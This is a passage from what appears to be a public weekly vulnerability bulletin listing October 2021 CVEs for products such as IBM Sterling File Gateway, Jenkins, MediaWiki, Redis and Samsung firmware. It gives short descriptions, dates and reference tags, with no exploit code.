IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow a remote authenticated user to cause a denial of another user's service due to insufficient permission checking. IBM X-Force ID: 195518.2021-10-07not yet calculatedCVE-2021-20372
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 6.0.0.0 through 6.1.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 199170.2021-10-07not yet calculatedCVE-2021-20552
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated attacker to enumerate usernames due to there being an observable discrepancy in returned messages. IBM X-Force ID: 195568.2021-10-07not yet calculatedCVE-2021-20376
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 197503.2021-10-07not yet calculatedCVE-2021-20481
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 197790.2021-10-07not yet calculatedCVE-2021-20489
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199230.2021-10-07not yet calculatedCVE-2021-20561
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow a remote attacker to upload arbitrary files, caused by improper access controls. IBM X-Force ID: 199397.2021-10-07not yet calculatedCVE-2021-20584
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway User Interface 2.2.0.0 through 6.1.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 196944.2021-10-07not yet calculatedCVE-2021-20473
CONFIRM
XF
ibm -- ts7700_management_interface
 
The IBM TS7700 Management Interface is vulnerable to unauthenticated access. By accessing a specially-crafted URL, an attacker may gain administrative access to the Management Interface without authentication. IBM X-Force ID: 207747.2021-10-06not yet calculatedCVE-2021-29908
CONFIRM
XF
icehrm -- icehrm
 
The IceHrm 30.0.0 OS website was found vulnerable to Session Management Issue. A signout from an admin account does not invalidate an admin session that is opened in a different browser.2021-10-04not yet calculatedCVE-2021-38823
MISC
integria_ims -- integria_imsIntegria IMS in its 5.0.92 version does not filter correctly some fields related to the login.php file. An attacker could exploit this vulnerability in order to perform a cross-site scripting attack (XSS).2021-10-07not yet calculatedCVE-2021-3834
CONFIRM
CONFIRM
integria_ims -- integria_ims
 
Integria IMS in its 5.0.92 version is vulnerable to a Remote Code Execution attack through file uploading. An unauthenticated attacker could abuse the AsyncUpload() function in order to exploit the vulnerability.2021-10-07not yet calculatedCVE-2021-3832
CONFIRM
CONFIRM
integria_ims -- integria_ims
 
Integria IMS login check uses a loose comparator ("==") to compare the MD5 hash of the password provided by the user and the MD5 hash stored in the database. An attacker with a specific formatted password could exploit this vulnerability in order to login in the system with different passwords.2021-10-07not yet calculatedCVE-2021-3833
CONFIRM
CONFIRM
intelliants -- subrion_cms
 
A SQL injection vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.2021-10-08not yet calculatedCVE-2021-41947
MISC
jeecms -- jeecms
 
JEECMS x1.1 contains a stored cross-site scripting (XSS) vulnerability in the component of /member-vipcenter.htm, which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.2021-10-07not yet calculatedCVE-2020-21729
MISC
jenkins -- git_plugin
 
Jenkins Git Plugin 4.8.2 and earlier does not escape the Git SHA-1 checksum parameters provided to commit notifications when displaying them in a build cause, resulting in a stored cross-site scripting (XSS) vulnerability.2021-10-06not yet calculatedCVE-2021-21684
CONFIRM
MLIST
jenkins -- jenkins
 
Jenkins 2.314 and earlier, LTS 2.303.1 and earlier accepts names of jobs and other entities with a trailing dot character, potentially replacing the configuration and data of other entities on Windows.2021-10-06not yet calculatedCVE-2021-21682
CONFIRM
MLIST
jenkins -- jenkins
 
The file browser in Jenkins 2.314 and earlier, LTS 2.303.1 and earlier may interpret some paths to files as absolute on Windows, resulting in a path traversal vulnerability allowing attackers with Overall/Read permission (Windows controller) or Job/Workspace permission (Windows agents) to obtain the contents of arbitrary files.2021-10-06not yet calculatedCVE-2021-21683
CONFIRM
MLIST
lancom -- lcos
 
In LCOS 10.40 to 10.42.0473-RU3 with SNMPv3 enabled on LANCOM devices, changing the password of the root user via the CLI does not change the password of the root user for SNMPv3 access. (However, changing the password of the root user via LANconfig does change the password of the root user for SNMPv3 access.)2021-10-07not yet calculatedCVE-2021-33903
MISC
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 is vulnerable to Session Management. A password change at sandbox.bookingcore.org/user/profile/change-password does not invalidate a session that is opened in a different browser.2021-10-04not yet calculatedCVE-2021-37333
MISC
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 is vulnerable to Cross Site Scripting (XSS). The Avatar upload in the My Profile section could be exploited to upload a malicious SVG file which contains Javascript. Now if another user/admin views the profile and clicks to view his avatar, an XSS will trigger.2021-10-04not yet calculatedCVE-2021-37330
MISC
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 is vulnerable to Incorrect Access Control. On the Verifications page, after uploading an ID Card or Trade License and viewing it, ID Cards and Trade Licenses of other vendors/users can be viewed by changing the URL.2021-10-04not yet calculatedCVE-2021-37331
MISC
lcds_laquis_scada -- lcds_laquis_scada
 
LCDS LAquis SCADA through 4.3.1.1085 is vulnerable to a control bypass and path traversal. If an attacker can get a victim to load a malicious els project file and use the play feature, then the attacker can bypass a consent popup and write arbitrary files to OS locations where the user has permission, leading to code execution.2021-10-04not yet calculatedCVE-2021-41579
MISC
liftoff -- gate_one
 
An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.2021-10-06not yet calculatedCVE-2020-19003
MISC
lightning_network -- blockstream_c-lightning
 
Blockstream c-lightning through 0.10.1 allows loss of funds because of dust HTLC exposure.2021-10-04not yet calculatedCVE-2021-41592
MISC
MISC
MISC
MISC
MISC
lightning_network -- lightning_labs
 
Lightning Labs lnd before 0.13.3-beta allows loss of funds because of dust HTLC exposure.2021-10-04not yet calculatedCVE-2021-41593
MISC
MISC
MISC
MISC
MISC
MISC
limesurvey -- limesurvey
 
The "File upload question" functionality in LimeSurvey 3.x-LTS through 3.27.18 allows XSS in assets/scripts/modaldialog.js and assets/scripts/uploader.js.2021-10-08not yet calculatedCVE-2021-42112
MISC
MISC
linux -- linux_kernel
 
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.2021-10-05not yet calculatedCVE-2021-42008
MISC
MISC
MISC
maian_cart -- maian_cart
 
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.2021-10-07not yet calculatedCVE-2021-32172
MISC
MISC
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in Special:MediaSearch in the MediaSearch extension in MediaWiki through 1.36.2. The suggestion text (a parameter to mediasearch-did-you-mean) was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the intitle: search operator within the query.2021-10-06not yet calculatedCVE-2021-42043
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in SpecialEditGrowthConfig in the GrowthExperiments extension in MediaWiki through 1.36.2. The growthexperiments-edit-config-error-invalid-title MediaWiki message was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript.2021-10-06not yet calculatedCVE-2021-42042
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in CentralAuth in MediaWiki through 1.36.2. The rightsnone MediaWiki message was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the setchange log.2021-10-06not yet calculatedCVE-2021-42041
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in MediaWiki through 1.36.2. A parser function related to loop control allowed for an infinite loop (and php-fpm hang) within the Loops extension because egLoopsCountLimit is mishandled. This could lead to memory exhaustion.2021-10-06not yet calculatedCVE-2021-42040
MISC
MISC
mediawiki -- mediawiki
 
The DynamicPageList3 extension is a reporting tool for MediaWiki, listing category members and intersections with various formats and details. In affected versions unsanitised input of regular expression date within the parameters of the DPL parser function, allowed for the possibility of ReDoS (Regex Denial of Service). This has been resolved in version 3.3.6. If you are unable to update you may also set `$wgDplSettings['functionalRichness'] = 0;` or disable DynamicPageList3 to mitigate.2021-10-04not yet calculatedCVE-2021-41118
MISC
MISC
CONFIRM
mediawiki -- mediawiki
 
An issue was discovered in the Mentor dashboard in the GrowthExperiments extension in MediaWiki through 1.36.2. The Growthexperiments-mentor-dashboard-mentee-overview-add-filter-total-edits-headline, growthexperiments-mentor-dashboard-mentee-overview-add-filter-starred-headline, growthexperiments-mentor-dashboard-mentee-overview-info-text, growthexperiments-mentor-dashboard-mentee-overview-info-legend-headline, and growthexperiments-mentor-dashboard-mentee-overview-active-ago MediaWiki messages were not being properly sanitized and allowed for the injection and execution of HTML and JavaScript.2021-10-06not yet calculatedCVE-2021-42044
MISC
MISC
meross -- msg100_devices
 
Meross MSG100 devices before 3.2.3 allow an attacker to replay the same data or similar data (e.g., an attacker who sniffs a Close message can transmit an acceptable Open message).2021-10-07not yet calculatedCVE-2021-35067
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20605
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20604
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Handling of Exceptional Conditions vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20602
MISC
MISC
mitsubishi_electric -- got_and_tension_controller 
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20603
MISC
MISC
mitsubishi_electric -- melsec_iq-r_series_c_controller_module_r12ccpu-v
 
Uncontrolled resource consumption in MELSEC iQ-R series C Controller Module R12CCPU-V all versions allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by sending a large number of packets in a short time while the module starting up.2021-10-08not yet calculatedCVE-2021-20600
MISC
MISC
MISC
mkdocs -- mkdocs
 
** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1.2021-10-07not yet calculatedCVE-2021-40978
MISC
MISC
MISC
MISC
moby -- moby
 
Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers.2021-10-04not yet calculatedCVE-2021-41091
MISC
CONFIRM
myscada_mydesigner_8.20.0 -- myscada_mydesigner_8.20.0
 
mySCADA myDESIGNER 8.20.0 and below allows Directory Traversal attacks when importing project files. If an attacker can trick a victim into importing a malicious mep file, then they gain the ability to write arbitrary files to OS locations where the user has permission. This would typically lead to code execution.2021-10-04not yet calculatedCVE-2021-41578
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the add() method.2021-10-06not yet calculatedCVE-2020-21650
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\point.php, which can be exploited via the add() method.2021-10-06not yet calculatedCVE-2020-21651
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the addqq() method.2021-10-06not yet calculatedCVE-2020-21652
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sj() method.2021-10-06not yet calculatedCVE-2020-21653
MISC
myucms -- myucms
 
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.2021-10-06not yet calculatedCVE-2020-21649
MISC
nagios_enterprises -- nagiosxiNagios Enterprises NagiosXI <= 5.8.4 contains a Server-Side Request Forgery (SSRF) vulnerability in schedulereport.php. Any authenticated user can create scheduled reports containing PDF screenshots of any view in the NagiosXI application. Due to lack of input sanitisation, the target page can be replaced with an SSRF payload to access internal resources or disclose local system files.2021-10-05not yet calculatedCVE-2021-37223
MISC
MISC
netsarang -- xshell
 
Xshell before 7.0.0.76 allows attackers to cause a crash by triggering rapid changes to the title bar.2021-10-07not yet calculatedCVE-2021-42095
MISC
node.js -- node.js
 
Node.js before 16.6.0, 14.17.4, and 12.22.4 is vulnerable to a use after free attack where an attacker might be able to exploit the memory corruption, to change process behavior.2021-10-07not yet calculatedCVE-2021-22930
MISC
MISC
october -- october_cms
 
October is a Content Management System (CMS) and web platform built on the the Laravel PHP Framework. In affected versions administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the october/october package. There are no workarounds for this issue and all users should update.2021-10-06not yet calculatedCVE-2021-41126
CONFIRM
MISC
octopus -- server
 
When Octopus Server is installed using a custom folder location, folder ACLs are not set correctly and could lead to an unprivileged user using DLL side-loading to gain privileged access.2021-10-07not yet calculatedCVE-2021-26556
MISC
octopus -- tentacle
 
When Octopus Tentacle is installed using a custom folder location, folder ACLs are not set correctly and could lead to an unprivileged user using DLL side-loading to gain privileged access.2021-10-07not yet calculatedCVE-2021-26557
MISC
onionshare -- onionshare
 
An information disclosure vulnerability in OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to retrieve the full list of participants of a non-public OnionShare node via the --chat feature.2021-10-04not yet calculatedCVE-2021-41867
MISC
MISC
onionshare -- onionshare
 
OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to upload files on a non-public node when using the --receive functionality.2021-10-04not yet calculatedCVE-2021-41868
MISC
MISC
open5gs -- open5gs
 
ogs_fqdn_parse in Open5GS 1.0.0 through 2.3.3 inappropriately trusts a client-supplied length value, leading to a buffer overflow. The attacker can send a PFCP Session Establishment Request with "internet" as the PDI Network Instance. The first character is interpreted as a length value to be used in a memcpy call. The destination buffer is only 100 bytes long on the stack. Then, 'i' gets interpreted as 105 bytes to copy from the source buffer to the destination buffer.2021-10-07not yet calculatedCVE-2021-41794
MISC
opensns -- opensns
 
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the cid parameter.2021-10-07not yet calculatedCVE-2020-21726
MISC
opensns -- opensns
 
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the pid parameter.2021-10-07not yet calculatedCVE-2020-21725
MISC
ping_identity -- pingfederate
 
Ping Identity PingFederate before 10.3.1 mishandles pre-parsing validation, leading to an XXE attack that can achieve XML file disclosure.2021-10-07not yet calculatedCVE-2021-41770
MISC
MISC
polycom -- poly_vvx_400/410
 
Poly VVX 400/410 through 5.3.1 allows low-privileged users to change the Admin password by modifying a POST parameter to 120 during the password reset process.2021-10-04not yet calculatedCVE-2021-41322
MISC
MISC
postgressql -- postgressql
 
A flaw was found in postgresql. Using an UPDATE ... RETURNING command on a purpose-crafted table, an authenticated database user could read arbitrary bytes of server memory. The highest threat from this vulnerability is to data confidentiality.2021-10-08not yet calculatedCVE-2021-32029
MISC
MISC
pterodactyl -- pterodactyl
 
Pterodactyl is an open-source game server management panel built with PHP 7, React, and Go. A malicious user can modify the contents of a `confirmation_token` input during the two-factor authentication process to reference a cache value not associated with the login attempt. In rare cases this can allow a malicious actor to authenticate as a random user in the Panel. The malicious user must target an account with two-factor authentication enabled, and then must provide a correct two-factor authentication token before being authenticated as that user. Due to a validation flaw in the logic handling user authentication during the two-factor authentication process a malicious user can trick the system into loading credentials for an arbitrary user by modifying the token sent to the server. This authentication flaw is present in the `LoginCheckpointController@__invoke` method which handles two-factor authentication for a user. This controller looks for a request input parameter called `confirmation_token` which is expected to be a 64 character random alpha-numeric string that references a value within the Panel's cache containing a `user_id` value. This value is then used to fetch the user that attempted to login, and lookup their two-factor authentication token. Due to the design of this system, any element in the cache that contains only digits could be referenced by a malicious user, and whatever value is stored at that position would be used as the `user_id`. There are a few different areas of the Panel that store values into the cache that are integers, and a user who determines what those cache keys are could pass one of those keys which would cause this code pathway to reference an arbitrary user. At its heart this is a high-risk login bypass vulnerability. However, there are a few additional conditions that must be met in order for this to be successfully executed, notably: 1.) The account referenced by the malicious cache key must have two-factor authentication enabled. An account without two-factor authentication would cause an exception to be triggered by the authentication logic, thusly exiting this authentication flow. 2.) Even if the malicious user is able to reference a valid cache key that references a valid user account with two-factor authentication, they must provide a valid two-factor authentication token. However, due to the design of this endpoint once a valid user account is found with two-factor authentication enabled there is no rate-limiting present, thusly allowing an attacker to brute force combinations until successful. This leads to a third condition that must be met: 3.) For the duration of this attack sequence the cache key being referenced must continue to exist with a valid `user_id` value. Depending on the specific key being used for this attack, this value may disappear quickly, or be changed by other random user interactions on the Panel, outside the control of the attacker. In order to mitigate this vulnerability the underlying authentication logic was changed to use an encrypted session store that the user is therefore unable to control the value of. This completely removed the use of a user-controlled value being used. In addition, the code was audited to ensure this type of vulnerability is not present elsewhere.2021-10-06not yet calculatedCVE-2021-41129
MISC
MISC
MISC
CONFIRM
raymart_dg/ahmed_helal_hotel-mgmt-system -- raymart_dg/ahmed_helal_hotel-mgmt-system
 
A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php.2021-10-04not yet calculatedCVE-2021-41651
MISC
MISC
red_hat -- openjdk-1.8_and_openjdk-11_containers
 
An insecure modification flaw in the /etc/passwd file was found in the openjdk-1.8 and openjdk-11 containers. This flaw allows an attacker with access to the container to modify the /etc/passwd and escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.2021-10-06not yet calculatedCVE-2021-20264
MISC
redis -- redisRedis is an open source, in-memory database that persists on disk. An integer overflow bug affecting all versions of Redis can be exploited to corrupt the heap and potentially be used to leak arbitrary contents of the heap or trigger remote code execution. The vulnerability involves changing the default set-max-intset-entries configuration parameter to a very large value and constructing specially crafted commands to manipulate sets. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the set-max-intset-entries configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32687
CONFIRM
MISC
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the ziplist data structure used by all versions of Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves modifying the default ziplist configuration parameters (hash-max-ziplist-entries, hash-max-ziplist-value, zset-max-ziplist-entries or zset-max-ziplist-value) to a very large value, and then constructing specially crafted commands to create very large ziplists. The problem is fixed in Redis versions 6.2.6, 6.0.16, 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the above configuration parameters. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32628
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. When parsing an incoming Redis Standard Protocol (RESP) request, Redis allocates memory according to user-specified values which determine the number of elements (in the multi-bulk header) and size of each element (in the bulk header). An attacker delivering specially crafted requests over multiple connections can cause the server to allocate significant amount of memory. Because the same parsing mechanism is used to handle authentication requests, this vulnerability can also be exploited by unauthenticated users. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways: Using network access control tools like firewalls, iptables, security groups, etc. or Enabling TLS and requiring users to authenticate using client side certificates.2021-10-04not yet calculatedCVE-2021-32675
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. The redis-cli command line tool and redis-sentinel service may be vulnerable to integer overflow when parsing specially crafted large multi-bulk network replies. This is a result of a vulnerability in the underlying hiredis library which does not perform an overflow check before calling the calloc() heap allocation function. This issue only impacts systems with heap allocators that do not perform their own overflow checks. Most modern systems do and are therefore not likely to be affected. Furthermore, by default redis-sentinel uses the jemalloc allocator which is also not vulnerable. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14.2021-10-04not yet calculatedCVE-2021-32762
CONFIRM
MISC
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. In affected versions an integer overflow bug in Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves changing the default proto-max-bulk-len and client-query-buffer-limit configuration parameters to very large values and constructing specially crafted very large stream elements. The problem is fixed in Redis 6.2.6, 6.0.16 and 5.0.14. For users unable to upgrade an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-32627
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the underlying string library can be used to corrupt the heap and potentially result with denial of service or remote code execution. The vulnerability involves changing the default proto-max-bulk-len configuration parameter to a very large value and constructing specially crafted network payloads or commands. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.2021-10-04not yet calculatedCVE-2021-41099
MISC
CONFIRM
redis -- redis
 
Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.2021-10-04not yet calculatedCVE-2021-32626
MISC
CONFIRM
samsung -- bluetoothsettingsprovider
 
An improper access control vulnerability in BluetoothSettingsProvider prior to SMR Oct-2021 Release 1 allows untrusted application to overwrite some Bluetooth information.2021-10-06not yet calculatedCVE-2021-25472
MISC
samsung -- cmfa_framework
 
SQL injection vulnerabilities in CMFA framework prior to SMR Oct-2021 Release 1 allow untrusted application to overwrite some CMFA framework information.2021-10-06not yet calculatedCVE-2021-25482
MISC
samsung -- dsp_kernel_driver
 
A possible heap-based buffer overflow vulnerability in DSP kernel driver prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25475
MISC
samsung -- exynos_cp_booting_drive
 
An improper error handling in Exynos CP booting driver prior to SMR Oct-2021 Release 1 allows local attackers to bypass a Secure Memory Protector of Exynos CP Memory.2021-10-06not yet calculatedCVE-2021-25481
MISC
samsung -- exynos_cp_chipset
 
A possible heap-based buffer overflow vulnerability in Exynos CP Chipset prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25479
MISC
samsung -- exynos_cp_chipset
 
A possible stack-based buffer overflow vulnerability in Exynos CP Chipset prior to SMR Oct-2021 Release 1 allows arbitrary memory write and code execution.2021-10-06not yet calculatedCVE-2021-25478
MISC
samsung -- factoryaircommandmanager
 
Path traversal vulnerability in FactoryAirCommandManager prior to SMR Oct-2021 Release 1 allows attackers to write file as system UID via BT remote socket.2021-10-06not yet calculatedCVE-2021-25485
MISC
samsung -- inputmanagerservice
 
Improper authentication in InputManagerService prior to SMR Oct-2021 Release 1 allows monitoring the touch event.2021-10-06not yet calculatedCVE-2021-25484
MISC
samsung -- ipcdump
 
Exposure of information vulnerability in ipcdump prior to SMR Oct-2021 Release 1 allows an attacker detect device information via analyzing packet in log.2021-10-06not yet calculatedCVE-2021-25486
MISC
samsung -- keymaster
 
A keyblob downgrade attack in keymaster prior to SMR Oct-2021 Release 1 allows attacker to trigger IV reuse vulnerability with privileged process.2021-10-06not yet calculatedCVE-2021-25490
MISC

samsung -- livfivextractor_library

Lack of boundary checking of a buffer in livfivextractor library prior to SMR Oct-2021 Release 1 allows OOB read.2021-10-06not yet calculatedCVE-2021-25483
MISC
samsung -- mediatek_rrc_protocol
 
An improper error handling in Mediatek RRC Protocol stack prior to SMR Oct-2021 Release 1 allows modem crash and remote denial of service.2021-10-06not yet calculatedCVE-2021-25477
MISC
samsung -- mfc_driver
 
A vulnerability in mfc driver prior to SMR Oct-2021 Release 1 allows memory corruption via NULL-pointer dereference.2021-10-06not yet calculatedCVE-2021-25491
MISC

samsung -- modem_interface_driver

Lack of boundary checking of a buffer in recv_data() of modem interface driver prior to SMR Oct-2021 Release 1 allows OOB read.2021-10-06not yet calculatedCVE-2021-25488
MISC
samsung -- modem_interface_driver
 
Assuming radio permission is gained, missing input validation in modem interface driver prior to SMR Oct-2021 Release 1 results in format string bug leading to kernel panic.2021-10-06not yet calculatedCVE-2021-25489
MISC
samsung -- modem_interface_driver
 
Lack of boundary checking of a buffer in set_skb_priv() of modem interface driver prior to SMR Oct-2021 Release 1 allows OOB read and it results in arbitrary code execution by dereference of invalid function pointer.2021-10-06not yet calculatedCVE-2021-25487
MISC
samsung -- notes
 
Lack of boundary checking of a buffer in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows OOB read.2021-10-06not yet calculatedCVE-2021-25492
MISC
samsung -- notes
 
Lack of boundary checking of a buffer in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows OOB read2021-10-06not yet calculatedCVE-2021-25493
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25494
MISC
samsung -- notes
 
A possible heap buffer overflow vulnerability in libSPenBase library of Samsung Notes prior to Samsung Note version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25495
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_dec_slice of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25496
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_cpy_slice of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25497
MISC
samsung -- notes
 
A possible buffer overflow vulnerability in maetd_eco_cb_mode of libSPenBase library of Samsung Notes prior to Samsung Notes version 4.3.02.61 allows arbitrary code execution.2021-10-06not yet calculatedCVE-2021-25498
MISC
samsung -- qualcomm_modem
 
A lack of replay attack protection in GUTI REALLOCATION COMMAND message process in Qualcomm modem prior to SMR Oct-2021 Release 1 can lead to remote denial of service on mobile network connection.2021-10-06not yet calculatedCVE-2021-25480
MISC

samsung -- samsungaccountsdksigninactivity_of_galaxy_store

Intent redirection vulnerability in SamsungAccountSDKSigninActivity of Galaxy Store prior to version 4.5.32.4 allows attacker to access content provider of Galaxy Store.2021-10-06not yet calculatedCVE-2021-25499
MISC
samsung -- security_mode_command
 
